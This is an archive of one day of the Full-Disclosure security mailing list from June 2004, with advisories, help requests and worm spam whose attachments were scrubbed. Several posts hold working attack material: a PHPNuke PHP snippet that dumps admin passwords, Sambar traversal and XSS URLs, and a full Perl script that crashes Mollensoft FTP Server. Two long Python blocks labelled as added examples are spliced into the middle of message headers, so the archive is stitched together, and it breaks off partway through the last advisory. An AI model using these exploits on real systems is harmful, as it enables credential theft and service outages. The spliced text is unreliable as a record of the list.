From dowlingg at sullcrom.com Tue Jun 1 07:02:11 2004
From: dowlingg at sullcrom.com (Dowling, Gabrielle)
Date: Tue, 1 Jun 2004 02:02:11 -0400
Subject: [Full-Disclosure] Cleaning viruses from netware
Message-ID:

A certain mass mailer that infected a netware environment? And you have a buddy to fix it?

Please talk about the mass mailer. You think it is in play,

G

-----Original Message-----
From: Gadi Evron
To: Full-Disclosure
CC: Dowling, Gabrielle
Sent: Mon May 31 09:53:39 2004
Subject: Re: [Full-Disclosure] Cleaning viruses from netware

Dowling, Gabrielle wrote:
> Gadi....
>
> What exactly are you encountering?
>
> If you aren't running an av nlm on the server(s) in question, you should be able to map a drive to the system from even a workstation, and run a scan from there.
>
> I'm not aware of anything that can actually infect a netware system, just things that can drop latent infectious content when write rights are relatively open.
>
> What exactly are you dealing with?

A certain mass mailer which infected a netware network.

I've dealt with most of it, but I am looking for some script similar to what a friend of mine once wrote for active directory, using LDAP and running from a domain admin account. The script scanned the network and remotely removed the infection... Which is what I am looking for, if one such as that already exists and can be shared.. only for netware.

Thanks for your answer,

Gadi Evron.

--
Email: ge at linuxbox.org. Work: gadie at cbs.gov.il. Backup: ge at warp.mx.dk.
Phone: +972-50-428610 (Cell).
PGP key for attachments: http://vapid.reprehensible.net/~ge/Gadi_Evron.asc
ID: 0xD9216A06 FP: 5BB0 D3E2 D3C1 19B7 2104 C0D0 A7B3 1CF7 D921 6A06
GPG key for encrypted email: http://vapid.reprehensible.net/~ge/Gadi_Evron_Emails.asc
ID: 0x06C7D450 FP: 3B88 845A DF1F 4062 E5BA 569A A87E 8DB7 06C7 D450

**********************************************************************
This e-mail is sent by a law firm and contains information that may be privileged and confidential. If you are not the intended recipient, please delete the e-mail and notify us immediately.
***********************************************************************

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040601/4ee1b4b3/attachment.html

From cm at coretec.at Tue Jun 1 08:24:39 2004
From: cm at coretec.at (Cm)
Date: Tue, 01 Jun 2004 08:24:39 +0100
Subject: [Full-Disclosure] Re: Hi
Message-ID:

An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040601/5f3f3ad2/attachment.html
-------------- next part --------------
A non-text attachment was scrubbed...
Name: You_are_dismissed.cpl
Type: application/octet-stream
Size: 21570 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040601/5f3f3ad2/attachment.obj

From sam at ipsupport.co.uk Tue Jun 1 08:09:54 2004
From: sam at ipsupport.co.uk (Sam Bashton)
Date: Tue, 1 Jun 2004 08:09:54 +0100
Subject: [Full-Disclosure] Possible bug in PHPNuke and other CMS
In-Reply-To: <40B9F55E.9050402@libero.it>
References: <40B9F55E.9050402@libero.it>
Message-ID: <20040601070954.GA23397@ipsupport.co.uk>

On Sun, May 30, 2004 at 04:53:18PM +0200, Luca Falavigna wrote:
> There is a vulnerability in PHPNuke that permits execution of arbitrary
> SQL queries on a database located on the same server as an attacker's
> account.
> This is the procedure: first of all the attacker must create a
> symlink pointing to the victim's db directory in the PHPNuke home directory
> because of the mainfile.php include method. After that he can build a simple
> php code executing a query to the PHPNuke database. Here is an example:
>
> <?php
> require_once ("/location_of_victim's_PHPNuke/mainfile.php");
> $sql = $db->sql_query("SELECT aid,pwd FROM ".$prefix."_authors");
> while($record = $db->sql_fetchrow($sql))
>     echo "Username: $record[aid]\nPassword: $record[pwd]\n\n";
> unset($sql);
> ?>

This is an administration issue rather than a security vulnerability.

In order to use this attack the attacker requires access to:

1. Another site on the victim's server
2. A sufficiently poorly administered server on which (s)he can:
   a. Create a symlink or
   b. Specify an absolute path for includes

Those hosting multiple PHP sites ought to be using PHP's open_basedir directive to limit the files that can be opened by PHP. If this isn't being used there are plenty of other easy attacks open to anyone with an account on the same server.

--
Sam Bashton
Systems Administrator
IP Support

From sudharsha at sms.lk Tue Jun 1 08:18:30 2004
From: sudharsha at sms.lk (sudharsha)
Date: Tue, 1 Jun 2004 13:18:30 +0600
Subject: [Full-Disclosure] watch guard
Message-ID: <003c01c447a8$ba7823d0$9f64a8c0@eng>

Hi all

Does anyone know a vulnerability in Watch guard?

Rgds
Sudharsha

From mg_outlaw at hotmail.com Tue Jun 1 09:12:24 2004
From: mg_outlaw at hotmail.com (m g)
Date: Tue, 01 Jun 2004 08:12:24 +0000
Subject: [Full-Disclosure] Beware of 'IBM laptop order' email
Message-ID:

Hi all,

Last week on the site of 'The Register' an article was published about spam-mail that used an unknown 'zero-day' vulnerability in IE. They did not release any information about the zero-day issue, so perhaps anyone on the list knows anything about this issue and whether or not this issue is really a zero-day vulnerability or just an old one.

The article can be found at the following URL:
http://www.theregister.co.uk/2004/05/24/fake_order_viral_scam/

Greetings Mike

_________________________________________________________________
Help STOP SPAM with the new MSN 8 and get 2 months FREE*
http://join.msn.com/?page=features/junkmail

From charlie at peopleandplanet.org Tue Jun 1 10:26:24 2004
From: charlie at peopleandplanet.org (Charlie Harvey)
Date: Tue, 01 Jun 2004 10:26:24 +0100
Subject: [Full-Disclosure] Re: Full-Disclosure digest, Vol 1 #1677 - 23 msgs
In-Reply-To: <20040528194410.10576.30329.Mailman@NETSYS.COM>
Message-ID: <40BC59D0.22356.163A22@localhost>

| Charlie...
|
| Put down the crack pipe and back away slowly. You are surely not
| suggesting that this issue of Cisco's code has anything...at
| all...remotely...in common with the people and actions you
| listed...seriously...

*blush* No, of course not!

The chap I replied to was asserting that breaking the law was ALWAYS wrong, whatever the circumstances, or the law. Sorry if people read it wrongly! I thought the snipping made clear the point I was making was simply that breaking laws can /sometimes/ be right.

Charlie

From oliver at greyhat.de Tue Jun 1 10:52:04 2004
From: oliver at greyhat.de (oliver at greyhat.de)
Date: Tue, 1 Jun 2004 11:52:04 +0200
Subject: [Full-Disclosure] Sambar Proxy Multiple Vulnerabilities
Message-ID: <5452427$108608324940bc50b158cee8.36652122@config10.schlund.de>

Sambar Proxy Multiple Vulnerabilities
=====================================

I found some vulnerabilities in Sambar Webproxy (www.sambar.com), which allow the sambar admin access to files outside of the application directories. Since Sambar comes with no password for admin as default, it might be a security problem if administration of Sambar proxy is allowed from any IP (by default it is restricted to 127.0.0.1!). In addition, I found some XSS.

Directory Traversal
===================
http://myserver/sysadmin/system/showini.asp?file=\..\..\..\..\..\..\..\boot.ini

See: www.oliverkarow.de/research/sambar_trav.GIF

Direct File Access
==================
http://localhost/sysadmin/system/showlog.asp?log=c:\boot.ini&tail=y

Cross Site Scripting
====================
http://localhost/sysadmin/system/show.asp?show=
http://localhost/sysadmin/system/showperf.asp?area=search&title=

Version
=======
I only tested Sambar 6.1 Beta 2 on Windows platform (x86). Other versions/platforms may also be affected.

Vendor
======
www.sambar.com
Vendor is informed, and is fixing these vulns in the next release.

Workaround
==========
Set a password for admin account and restrict administration to localhost (default).

Credits
=======
15.05.2004
www.oliverkarow.de
www.oliverkarow.de/research/sambar.txt

From se_cur_ity at hotmail.com Tue Jun 1 11:17:10 2004
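The two file-disclosure URLs in the Sambar advisory above, as an added example that is not part of Oliver Karow's advisory or of Sambar's code: a Python containment check of the kind showini.asp and showlog.asp were missing. It canonicalizes the user-supplied value with Windows path semantics (ntpath, so it runs on any host) and refuses anything that does not stay under the directory the script is meant to serve. It goes a little beyond the two payloads on the page by also rejecting other drive letters and UNC paths. The install directories, the mapping of script name to parameter and the benign third request are assumptions for the demonstration; only the URLs and parameter names come from the advisory.

```python
"""Reject file/log parameters that escape their directory (added example).

Not Sambar's code: the advisory shows showini.asp?file= and showlog.asp?log=
accepting "\\..\\..\\boot.ini" and "c:\\boot.ini"; this is the containment
check such handlers need.  ntpath gives Windows path semantics on any host.
"""
import ntpath
from urllib.parse import parse_qs, urlsplit

# Assumed install layout; the real Sambar directories are not given in the advisory.
CONFIG_DIR = r"C:\Sambar\config"
LOG_DIR = r"C:\Sambar\logs"

# script name -> (query parameter that names a file, directory it must stay in);
# the script and parameter names come from the advisory URLs.
PATH_PARAMS = {
    "showini.asp": ("file", CONFIG_DIR),
    "showlog.asp": ("log", LOG_DIR),
}


def resolve_under(base, user_path):
    """Return the canonical path if user_path stays inside base, else None.

    ntpath.join lets a rooted ("\\..\\x"), drive-qualified ("c:\\x") or
    UNC ("\\\\srv\\share") value replace base entirely; normpath then
    collapses every ".." that is left.  Comparing the common prefix of
    the result with base catches all of those escapes at once.
    """
    base = ntpath.normpath(base)
    candidate = ntpath.normpath(ntpath.join(base, user_path))
    try:
        common = ntpath.commonpath([base, candidate])
    except ValueError:  # different drive letter or UNC share
        return None
    return candidate if common.lower() == base.lower() else None


def is_within(base, user_path):
    return resolve_under(base, user_path) is not None


def classify_request(url):
    """'traversal' if any file parameter escapes its directory, 'ok' if all
    stay inside, 'n/a' for scripts this check does not know about."""
    parts = urlsplit(url)
    script = parts.path.rsplit("/", 1)[-1].lower()
    if script not in PATH_PARAMS:
        return "n/a"
    param, base = PATH_PARAMS[script]
    values = parse_qs(parts.query, keep_blank_values=True).get(param, [])
    if any(not is_within(base, v) for v in values):
        return "traversal"
    return "ok"


# Constructed sample: the two advisory URLs plus a request the admin UI should allow.
SAMPLE_REQUESTS = [
    r"http://myserver/sysadmin/system/showini.asp?file=\..\..\..\..\..\..\..\boot.ini",
    r"http://localhost/sysadmin/system/showlog.asp?log=c:\boot.ini&tail=y",
    "http://localhost/sysadmin/system/showini.asp?file=server.ini",
]


def classify_all(urls=SAMPLE_REQUESTS):
    return {u: classify_request(u) for u in urls}


if __name__ == "__main__":
    for url, verdict in classify_all().items():
        print(f"{verdict:9s} {url}")
```

Note that the check is done on the resolved path, not by searching the input for "..": a value such as "sub\..\server.ini" resolves inside the directory and is allowed, while "../../boot.ini" with forward slashes is still caught because ntpath treats both separators alike.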
From: se_cur_ity at hotmail.com (morning_wood)
Date: Tue, 1 Jun 2004 03:17:10 -0700
Subject: [Full-Disclosure] Beware of 'IBM laptop order' email
References:
Message-ID:

http://www.f-secure.com/v-descs/wallon.shtml

> Last week on the site of 'The Register' an article was published about
> spam-mail that used an unknown 'zero-day' vulnerability in IE. They did not
> release any information about the zero-day issue, so perhaps anyone on the
> list knows anything about this issue and whether or not this issue is really
> a zero-day vulnerability or just an old one,
>
> The article can be found at the following URL:
> http://www.theregister.co.uk/2004/05/24/fake_order_viral_scam/
>

From eric at swordsoft.com Tue Jun 1 11:27:59 2004
From: eric at swordsoft.com (Eric Knight)
Date: Tue, 1 Jun 2004 04:27:59 -0600
Subject: [Full-Disclosure] Visual Enterprise Security/Fatum Agent Open Beta Announcement
Message-ID: <019101c447c3$1d40d740$6600a8c0@datendrao2d5z7>

Greetings,

This is an open call for beta testers and interested parties to take a look at the Visual Enterprise Security Server and Fatum Agent technology that I (SwordSoft, me.) have been developing. It's a Microsoft Windows based Agent/Server security and management architecture that is meant to be an experimental design for integration of security tools based on the design strategies presented in the "Treatise on Informational Warfare" (As it stands, 75% of the framework has been implemented.)

The information about the product(s) can be found at:

http://www.swordsoft.com/modules.php?name=VES (Visual Enterprise Security)
http://www.swordsoft.com/modules.php?name=Fatum (Fatum Agent)

You can download it now without a bunch of registration forms and whatnot immediately from:

http://www.swordsoft.com/modules.php?name=Downloads

To stem off "I'm doing this for the advertising" complaints, the product may be planned for commercial use, and there are people working gratis to help build SwordSoft, but the VES/Fatum products are going to be free for up to 10 computers even after it goes final. I do want this product to be used by the majority, it's aimed at the small environments and tries to move as far away from the "expensive band-aid" as possible. Aside from that, VES currently isn't "for sale" by SwordSoft and in fact, nothing on the web site is. The program was written in a very small computing environment, so it's a big mystery to us if it can even scale past 10 computers - we're predicting 20, although in theory a PC with a gig of ram could handle 250.. Anyway, the point being its concept technology brought to a level where it needs to get out of the lab.

I've written almost 400,000 lines of code into this, made over 1,000 icons, the distribution size is about 20 megabytes for the server, 10 megabytes for the Agent. With some help from some supporters providing distribution bandwidth, we're giving "grassroots" a try to at least figure out what the people in the industry think of this "concept-ware". I did my best to keep the project as professional as possible given its scale, lack of resources, and such. I was following my dream for an "all encompassing" type of integrated security environment that at least makes a genuine attempt to be friendly and easy to use.

The reality behind a program like this is that it's a series of growth steps, building framework, building tools to test it, building components, platform tests, etc. My choices for tools at this time were based on framework integration, not industry need, but you'll get the idea what the whole system is capable of if you play around. I've been focusing more on industry demands lately.

Anyway, enjoy. I hope you'll find it useful. I'll continue to support the development of the products; I've got no end to the number of improvements I want to make. The Beta keys don't have time expiration. They'll be fully functional for when the product is in "final" release. And otherwise, I look forward to hearing about what people think of this effort.

Thank you,

Eric Knight
Security Researcher, Overworked, Dazed.
eric at swordsoft.com

From prandal at herefordshire.gov.uk Tue Jun 1 11:49:31 2004
From: prandal at herefordshire.gov.uk (Randal, Phil)
Date: Tue, 1 Jun 2004 11:49:31 +0100
Subject: [Full-Disclosure] Beware of 'IBM laptop order' email
Message-ID: <801403078973F243A6A74322E134AF500F1C65@mail.herefordshire.gov.uk>

Good try, but it doesn't match what we received here.

The site linked to in the original email was down by the time I got to investigating, alas.

Phil

----
Phil Randal
Network Engineer
Herefordshire Council
Hereford, UK

> -----Original Message-----
> From: full-disclosure-admin at lists.netsys.com
> [mailto:full-disclosure-admin at lists.netsys.com] On Behalf Of
> morning_wood
> Sent: 01 June 2004 11:17
> To: m g; full-disclosure at lists.netsys.com
> Subject: Re: [Full-Disclosure] Beware of 'IBM laptop order' email
>
> http://www.f-secure.com/v-descs/wallon.shtml
>
> > Last week on the site of 'The Register' an article was published about
> > spam-mail that used an unknown 'zero-day' vulnerability in IE. They
> > did not release any information about the zero-day issue, so perhaps
> > anyone on the list knows anything about this issue and whether or not
> > this issue is really a zero-day vulnerability or just an old one,
> >
> > The article can be found at the following URL:
> > http://www.theregister.co.uk/2004/05/24/fake_order_viral_scam/
> >
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

From cm at coretec.at Tue Jun 1 14:19:03 2004
From: cm at coretec.at (Cm)
Date: Tue, 01 Jun 2004 14:19:03 +0100
Subject: [Full-Disclosure] New changes
Message-ID:

An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040601/8175754a/attachment.html
-------------- next part --------------
A non-text attachment was scrubbed...
Name: Message.scr
Type: application/octet-stream
Size: 20397 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040601/8175754a/attachment.obj

From ge at egotistical.reprehensible.net Tue Jun 1 15:38:15 2004
From: ge at egotistical.reprehensible.net (Gadi Evron)
Date: Tue, 01 Jun 2004 16:38:15 +0200
Subject: [Full-Disclosure] Cleaning viruses from netware
In-Reply-To:
References:
Message-ID: <40BC94D7.7040306@egotistical.reprehensible.net>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Dowling, Gabrielle wrote:
| A certain mass mailer that infected a netware environment? And you have a buddy to fix it?
|
| Please talk about the mass mailer. You think it is in play,
|
| G

My inquiry was about netware, not a particular virus.

Thank you for all your help, I have received an answer privately.

Have a good day!

Gadi Evron.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (MingW32)

iD8DBQFAvJTWqH6NtwbH1FARAiYFAKCJgF7wMxB0Yxofz2VpKVO1Yz2EMgCfWXqT
0ADuE76uLwPWzRFGYnYy8z4=
=YUQS
-----END PGP SIGNATURE-----

From cm at coretec.at Tue Jun 1 16:18:48 2004
From: cm at coretec.at (Cm)
Date: Tue, 01 Jun 2004 16:18:48 +0100
Subject: [Full-Disclosure] Hidden message
Message-ID:

An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040601/9518b6d5/attachment.html
-------------- next part --------------
A non-text attachment was scrubbed...
Name: You_will_answer_to_me.scr
Type: application/octet-stream
Size: 20995 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040601/9518b6d5/attachment.obj

From skip at duckwall.net Tue Jun 1 15:22:43 2004
From: skip at duckwall.net (Skip Duckwall)
Date: Tue, 1 Jun 2004 09:22:43 -0500 (CDT)
Subject: [Full-Disclosure] Beware of 'IBM laptop order' email
In-Reply-To:
References:
Message-ID:

Since it's a phishing email, I'm sure the exploit they're referring to is the one that exploits the compiled help files (.chm files), even though it's not exactly new... Although the way the hostile chm files are executed without user intervention has been patched (the MS-ITS vulnerability in MS04-013 I believe...)

This type of phishing scam isn't really all that new and you can find all sorts of writeups using google. A particularly decent site that has lots of phishing writeups (aside from the one I'm linking to)

http://spamwatch.codefish.net.au/modules.php?op=modload&name=News&file=article&sid=98

just my guess....

Alva Lease 'Skip' Duckwall
CISSP,RHCE,SCSA
skip at duckwall dot net

On Tue, 1 Jun 2004, m g wrote:

> Hi all,
>
> Last week on the site of 'The Register' an article was published about
> spam-mail that used an unknown 'zero-day' vulnerability in IE. They did not
> release any information about the zero-day issue, so perhaps anyone on the
> list knows anything about this issue and whether or not this issue is really
> a zero-day vulnerability or just an old one,
>
> The article can be found at the following URL:
> http://www.theregister.co.uk/2004/05/24/fake_order_viral_scam/
>
> Greetings Mike
>
> _________________________________________________________________
> Help STOP SPAM with the new MSN 8 and get 2 months FREE*
> http://join.msn.com/?page=features/junkmail
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

From keydet89 at yahoo.com Tue Jun 1 15:22:49 2004
From: keydet89 at yahoo.com (Harlan Carvey)
Date: Tue, 1 Jun 2004 07:22:49 -0700 (PDT)
Subject: [Full-Disclosure] Cleaning viruses from netware
In-Reply-To: <40BC94D7.7040306@egotistical.reprehensible.net>
Message-ID: <20040601142249.30999.qmail@web51503.mail.yahoo.com>

Gadi,

For the sake of the list, would you be willing to share the answer you received?

--- Gadi Evron wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Dowling, Gabrielle wrote:
>
> | A certain mass mailer that infected a netware environment? And you
> have a buddy to fix it?
> |
> | Please talk about the mass mailer. You think it is in play,
> |
> | G
>
> My inquiry was about netware, not a particular virus.
>
> Thank you for all your help, I have received an answer privately.
>
> Have a good day!
>
> Gadi Evron.
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.2.3 (MingW32)
>
> iD8DBQFAvJTWqH6NtwbH1FARAiYFAKCJgF7wMxB0Yxofz2VpKVO1Yz2EMgCfWXqT
> 0ADuE76uLwPWzRFGYnYy8z4=
> =YUQS
> -----END PGP SIGNATURE-----
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

From ge at egotistical.reprehensible.net Tue Jun 1 16:26:33 2004
From: ge at egotistical.reprehensible.net (Gadi Evron)
Date: Tue, 01 Jun 2004 17:26:33 +0200
Subject: [Full-Disclosure] Cleaning viruses from netware
In-Reply-To: <20040601142249.30999.qmail@web51503.mail.yahoo.com>
References: <20040601142249.30999.qmail@web51503.mail.yahoo.com>
Message-ID: <40BCA029.4050403@egotistical.reprehensible.net>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Harlan Carvey wrote:
| Gadi,
|
| For the sake of the list, would you be willing to
| share the answer you received?

I will ask the person who replied.

Gadi Evron.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (MingW32)

iD8DBQFAvKAmqH6NtwbH1FARAtPXAJ9jXsuC8f+99IhBaX/kyof6+pvGEgCfefAn
ulHaMkWYk0PpF+f9NOgn+i8=
=hfIz
-----END PGP SIGNATURE-----

From bwiedman at iconsinc.com Tue Jun 1 17:05:23 2004
From: bwiedman at iconsinc.com (Blake Wiedman)
Date: Tue, 1 Jun 2004 12:05:23 -0400
Subject: [Full-Disclosure] Running Both CISCO VPN and Symantec VPN
In-Reply-To:
Message-ID: <000301c447f2$3f07ccb0$f301010a@corp.fidelityfederal.com>

I have a client that is running a Symantec 5420 device. Unfortunately we have a few contractors that use the Cisco VPN client. The Cisco VPN client and the Symantec VPN client will not coexist. Has anyone had a similar problem? And how did you solve it?

-----Original Message-----
From: full-disclosure-admin at lists.netsys.com [mailto:full-disclosure-admin at lists.netsys.com] On Behalf Of Skip Duckwall
Sent: Tuesday, June 01, 2004 10:23 AM
To: full-disclosure at lists.netsys.com
Subject: Re: [Full-Disclosure] Beware of 'IBM laptop order' email

Since it's a phishing email, I'm sure the exploit they're referring to is the one that exploits the compiled help files (.chm files), even though it's not exactly new... Although the way the hostile chm files are executed without user intervention has been patched (the MS-ITS vulnerability in MS04-013 I believe...)

This type of phishing scam isn't really all that new and you can find all sorts of writeups using google. A particularly decent site that has lots of phishing writeups (aside from the one I'm linking to)

http://spamwatch.codefish.net.au/modules.php?op=modload&name=News&file=article&sid=98

just my guess....

Alva Lease 'Skip' Duckwall
CISSP,RHCE,SCSA
skip at duckwall dot net

On Tue, 1 Jun 2004, m g wrote:

> Hi all,
>
> Last week on the site of 'The Register' an article was published about
> spam-mail that used an unknown 'zero-day' vulnerability in IE. They did not
> release any information about the zero-day issue, so perhaps anyone on the
> list knows anything about this issue and whether or not this issue is really
> a zero-day vulnerability or just an old one,
>
> The article can be found at the following URL:
> http://www.theregister.co.uk/2004/05/24/fake_order_viral_scam/
>
> Greetings Mike
>
> _________________________________________________________________
> Help STOP SPAM with the new MSN 8 and get 2 months FREE*
> http://join.msn.com/?page=features/junkmail
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

From api at epost.de Tue Jun 1 17:26:26 2004
From: api at epost.de (Axel Pettinger)
Date: Tue, 01 Jun 2004 18:26:26 +0200
Subject: [Full-Disclosure] Beware of 'IBM laptop order' email
References:
Message-ID: <40BCAE32.DBD0D6E2@epost.de>

Skip Duckwall wrote:
>
> Since it's a phishing email, I'm sure the exploit they're referring to
> is the one that exploits the compiled help files (.chm files), even
> though it's not exactly new... Although the way the hostile chm files
> are executed without user intervention has been patched (the MS-ITS
> vulnerability in MS04-013 I believe...)
>
> This type of phishing scam isn't really all that new and you can find
> all sorts of writeups using google.
>
> just my guess....

Good guess ...

http://groups.google.com/groups?threadm=1085148506.86377.0%40despina.uk.clara.net

Regards,
Axel Pettinger

From aviram at beyondsecurity.com Tue Jun 1 18:12:55 2004
From: aviram at beyondsecurity.com (Aviram Jenik)
Date: Tue, 1 Jun 2004 20:12:55 +0300
Subject: [Full-Disclosure] Mollensoft Lightweight FTP Server CWD Buffer Overflow
Message-ID: <200406012012.55080.aviram@beyondsecurity.com>

Mollensoft Lightweight FTP Server CWD Buffer Overflow
------------------------------------------------------------------------

Article reference:
http://www.securiteam.com/windowsntfocus/5RP0L15CUM.html

SUMMARY

STORM has discovered a security vulnerability in Mollensoft Lightweight FTP Server. Mollensoft Lightweight FTP Server's support for the CWD command does not correctly verify that the argument of the CWD command does not overflow any of its internal buffers. This insufficient verification allows an authenticated (anonymous or otherwise) user to cause the FTP server to crash while trying to read an arbitrary memory location by issuing a malformed CWD command.

DETAILS

Vulnerable Systems:
 * Mollensoft Lightweight FTP Server version 3.6

Vendor Response:
BigAl (author) responded with the following:

I wrote this particular app with Visual Basic and used an FTP ActiveX COM component and I am waiting for the component creator to get back to me regarding the fix. Unfortunately I cannot snip off any of the commands, as access to the command length is not available from the VB component using straight VB Code. I am working on moving to .Net so hopefully I can have a new FTP server out by fall time frame which is truly multi-threaded and totally coded by me.

Exploit:

#!/usr/bin/perl
#
# Mollensoft FTP Server CWD Buffer Overflow
#
# Orkut users? Come join the SecuriTeam community
# http://www.orkut.com/Community.aspx?cmm=44441

use strict;
use IO::Socket::INET;

usage() unless (@ARGV == 2);

my $host = shift(@ARGV);
my $port = shift(@ARGV);

# create the socket
my $socket = IO::Socket::INET->new(proto => 'tcp', PeerAddr => $host, PeerPort => $port);
$socket or die "Cannot connect to host!\n";
$socket->autoflush(1);

# receive greeting
my $repcode  = "220 ";
my $response = recv_reply($socket, $repcode);
print $response;

# send USER command
#my $username = "%00" x 2041;
my $username = "anonymous";
print "USER $username\r\n";
print $socket "USER $username\r\n";
select(undef, undef, undef, 0.002);    # sleep of 2 milliseconds

# send PASS command
my $password = "a\@b.com";
print "PASS $password\r\n";
print $socket "PASS $password\r\n";

# send the overlong CWD argument that crashes the server
my $cmd = "CWD ";
$cmd .= "A" x 224;    # Value can range from 224 to 1018
$cmd .= "\r\n";
print "length: " . length($cmd) . "\n";
print $socket $cmd;

# read whatever comes back (normally nothing; the server has crashed)
$repcode = "";
recv_reply($socket, $repcode);
close($socket);
exit(0);

sub usage {
    # print usage information
    print "\nUsage: Mollensoft_FTP_Server_crash.pl <host> <port>\n"
        . " <host> - The host to connect to\n"
        . " <port> - The TCP port which the FTP server is listening on\n\n";
    exit(1);
}

sub recv_reply {
    # retrieve any reply, up to and including the line matching $repcode
    my $socket  = shift;
    my $repcode = shift;
    $socket or die "Can't receive on socket\n";
    my $res = "";
    while (<$socket>) {
        $res .= $_;
        if (/$repcode/) { last; }
    }
    return $res;
}

ADDITIONAL INFORMATION

SecurITeam would like to thank STORM for finding this vulnerability.

Regards,
Aviram Jenik
Beyond Security Ltd.
http://www.BeyondSecurity.com
http://www.SecuriTeam.com

The First Integrated Network and Web Application Vulnerability Scanner:
http://www.beyondsecurity.com/webscan-wp.pdf

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
From ge at linuxbox.org Tue Jun 1 17:46:55 2004
From: ge at linuxbox.org (Gadi Evron)
Date: Tue, 01 Jun 2004 18:46:55 +0200
Subject: [Full-Disclosure] Cleaning viruses from netware
In-Reply-To: <20040601142249.30999.qmail@web51503.mail.yahoo.com>
References: <20040601142249.30999.qmail@web51503.mail.yahoo.com>
Message-ID: <40BCB2FF.8040600@linuxbox.org>

Harlan Carvey wrote:
> Gadi,
>
> For the sake of the list, would you be willing to
> share the answer you received?

Begin quote>>>

ST wrote:
---------
It is relatively easy if the virus is detectable remotely, i.e. it has a component listening on a port. A simple nmap scan followed by a remote connect and run of the disinfection tool will work. I prefer this approach over using the directory service as it catches all active machines, irrespective of whether they are in the directory or not.

Another approach is to use a login script that runs the disinfection util automatically; subsequent logins do not run the script. I used the absence of a file in a directory to indicate that the util had to be run, run the script and then *IF* successful, create the flag file.

A combo of these methods will rapidly and effectively catch most of the infected machines and remove them.
-----

Gadi.

From aviram at beyondsecurity.com Tue Jun 1 18:40:14 2004
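ST's first method in the message Gadi Evron quotes above (sweep the network for the port the worm's component listens on, then connect to each hit and run the cleaner), as an added example that is not part of the thread: a Python helper that reads nmap's grepable output (`nmap -oG -`) and returns the hosts where that port is open, which is the target list the disinfection tool is then run against. The port number, the scan output and the host names are constructed for the demonstration; the page names neither the mass mailer nor its port, and the remote-execution step is site-specific and left out.

```python
"""Turn an nmap sweep into a disinfection target list (added example).

Not code from the thread.  ST's method: scan for the port the worm's
component listens on, then connect to each hit and run the cleaner.
This parses `nmap -oG -` output, which is one "Host:" line per host with
"/"-separated port fields, and picks the hosts that need cleaning.
"""
import re

# Assumed: the worm in the thread is unnamed, so this port is a placeholder.
WORM_PORT = 3127

# Constructed `nmap -p 3127 -oG -` output for four hosts (not a real scan).
SAMPLE_NMAP_OUTPUT = """\
# Nmap 3.50 scan initiated Tue Jun  1 10:00:00 2004 as: nmap -p 3127 -oG - 192.168.1.0/24
Host: 192.168.1.10 (ws10.example.lan)\tPorts: 3127/open/tcp//unknown///\tIgnored State: closed (0)
Host: 192.168.1.11 (ws11.example.lan)\tPorts: 3127/closed/tcp//unknown///
Host: 192.168.1.12 ()\tPorts: 3127/filtered/tcp//unknown///
Host: 192.168.1.13 (srv13.example.lan)\tPorts: 139/open/tcp//netbios-ssn///, 3127/open/tcp//unknown///
# Nmap run completed at Tue Jun  1 10:00:05 2004 -- 256 IP addresses (4 hosts up) scanned
"""

HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\(([^)]*)\)")


def parse_grepable(text):
    """Yield (ip, hostname, {(port, proto): state}) for every Host: line.

    Grepable port entries look like "3127/open/tcp//unknown///":
    port/state/protocol/owner/service/rpcinfo/version, comma separated.
    """
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue  # comment lines and anything else nmap prints
        ip, name = m.group(1), m.group(2)
        ports = {}
        for field in line.split("\t"):
            if not field.startswith("Ports:"):
                continue
            for entry in field[len("Ports:"):].split(","):
                parts = entry.strip().split("/")
                if len(parts) >= 3 and parts[0].isdigit():
                    ports[(int(parts[0]), parts[2])] = parts[1]
        yield ip, name, ports


def infected_hosts(text, port=WORM_PORT, proto="tcp"):
    """IPs where the worm's port is open, in scan order.

    'filtered' and 'closed' are deliberately not counted: only an open
    listener is evidence that the component is running on that host.
    """
    return [ip for ip, _name, ports in parse_grepable(text)
            if ports.get((port, proto)) == "open"]


if __name__ == "__main__":
    for ip in infected_hosts(SAMPLE_NMAP_OUTPUT):
        print(f"{ip}: port {WORM_PORT} open, run the disinfection tool here")
```

Feed it a real sweep with `nmap -p <port> -oG - <range> | python3 sweep.py` and the hit list is what the "remote connect and run" step iterates over; as ST notes, this catches machines the directory does not know about, but it also misses anything powered off during the sweep, which is what the login-script method covers.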
From: aviram at beyondsecurity.com (Aviram Jenik)
Date: Tue, 1 Jun 2004 20:40:14 +0300
Subject: [Full-Disclosure] Firebird Database Remote Database Name Overflow
Message-ID: <200406012040.14839.aviram@beyondsecurity.com>

Firebird Database Remote Database Name Overflow
------------------------------------------------------------------------

Article reference:
http://www.securiteam.com/unixfocus/5AP0P0UCUO.html

SUMMARY

